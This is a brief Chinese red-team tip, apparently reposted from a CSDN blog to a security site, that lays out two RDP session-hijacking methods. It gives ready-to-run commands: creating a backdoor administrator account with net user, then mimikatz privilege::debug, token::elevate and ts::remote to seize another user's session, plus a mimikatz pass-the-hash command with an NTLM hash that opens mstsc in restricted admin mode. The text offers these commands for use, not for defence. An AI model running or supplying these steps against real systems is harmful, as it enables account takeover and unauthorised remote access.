红队技巧|关于RDP劫持小技巧

admin 2022年12月12日12:52:42评论61 views字数 543阅读1分48秒阅读模式
一、劫持方式1:

创建用户:

net user test 123.com /add net localgroup administrators test /add

登录后,使用mimikatz工具

privilege::debug #提权 
ts::sessions #查看当前主机的会话
token::elevate #提升本地管理员权限为system
ts::remote /id:1 #劫持id为1的会话

二、劫持方式2:

mimikatz命令如下:

privilege::debug 
sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

执行后弹出远程登录界面,选择连接,成功实现远程登录

————————————————

作者:Adminxe
原文链接:https://blog.csdn.net/Adminxe/article/details/124197551

关注公众号后台回复数字 1126 获取 应急响应实战笔记,1127 - ctf工具集合,1230 - 内网工具,3924 - 弱口令爆破工具。

原文始发于微信公众号(菜鸟学信安):红队技巧|关于RDP劫持小技巧

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月12日12:52:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队技巧|关于RDP劫持小技巧http://cn-sec.com/archives/1458289.html

发表评论

匿名网友 填写信息